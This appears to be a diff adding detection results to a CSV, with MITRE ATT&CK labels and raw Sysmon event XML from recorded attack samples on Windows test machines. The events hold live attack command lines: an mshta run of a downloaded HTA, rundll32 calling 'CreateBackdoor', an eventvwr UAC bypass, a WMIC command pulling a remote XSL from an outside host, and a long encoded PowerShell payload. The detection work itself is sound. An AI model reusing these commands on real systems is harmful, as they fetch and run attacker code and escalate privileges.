+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
+    <Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
+    <Data Name=""ProcessId"">652</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
+    <Data Name=""LogonId"">0x135a4</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
+    <Data Name=""ParentProcessId"">3660</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&amp;&amp;del del /F /Q /A:H &quot;C:\Users\IEUser\AppData\Roaming\wwlib.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T11:43:49.229742Z"">
+    </TimeCreated>
+    <EventRecordID>417085</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3500"" ThreadID=""4688"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 11:43:49.217</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8F5-5F8A-0000-00106B6F7300</Data>
+    <Data Name=""ProcessId"">1680</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd /c ping 127.0.0.1&amp;&amp;del del /F /Q /A:H &quot;C:\Users\IEUser\AppData\Roaming\wwlib.dll&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
+    <Data Name=""LogonId"">0xa09d1</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:28.250664Z"">
+    </TimeCreated>
+    <EventRecordID>4916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:28.197</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-001067768800</Data>
+    <Data Name=""ProcessId"">1296</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.221386Z"">
+    </TimeCreated>
+    <EventRecordID>243540</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.029</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010946B2000</Data>
+    <Data Name=""ProcessId"">1828</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
+    </TimeCreated>
+    <EventRecordID>7648</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
+    <Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
+    <Data Name=""ProcessId"">652</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
+    <Data Name=""LogonId"">0x135a4</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
+    <Data Name=""ParentProcessId"">3660</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( &quot;C:\Windows\system32\mmc.exe&quot; &quot;C:\Windows\system32\eventvwr.msc&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:57:04.681038Z"">
+    </TimeCreated>
+    <EventRecordID>15</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1088,technique_name=Bypass User Account Control</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:57:04.500</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC60-5CB8-0000-001037BA0800</Data>
+    <Data Name=""ProcessId"">3900</Data>
+    <Data Name=""Image"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft Management Console</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\mmc.exe&quot; &quot;C:\Windows\system32\eventvwr.msc&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
+    <Data Name=""LogonId"">0xca21</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AC60-5CB8-0000-001002B30800</Data>
+    <Data Name=""ParentProcessId"">3904</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting  Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot;) and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine (&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-15T07:13:42.294109Z"">
+    </TimeCreated>
+    <EventRecordID>7648</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2044"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-15 07:13:42.278</Data>
+    <Data Name=""ProcessGuid"">365ABB72-9AA6-5D04-0000-00109C850F00</Data>
+    <Data Name=""ProcessId"">652</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-98E4-5D04-0000-0020A4350100</Data>
+    <Data Name=""LogonId"">0x135a4</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9972-5D04-0000-0010F0490C00</Data>
+    <Data Name=""ParentProcessId"">3660</Data>
+    <Data Name=""ParentImage"">C:\Program Files\Internet Explorer\iexplore.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; C:\Users\IEUser\Downloads\update.html</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:18.121924Z"">
+    </TimeCreated>
+    <EventRecordID>5913</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:18.081</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00100C87FF00</Data>
+    <Data Name=""ProcessId"">2896</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.username</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic  process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-23T16:49:05.736570Z"">
+    </TimeCreated>
+    <EventRecordID>892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-23 16:49:05.686</Data>
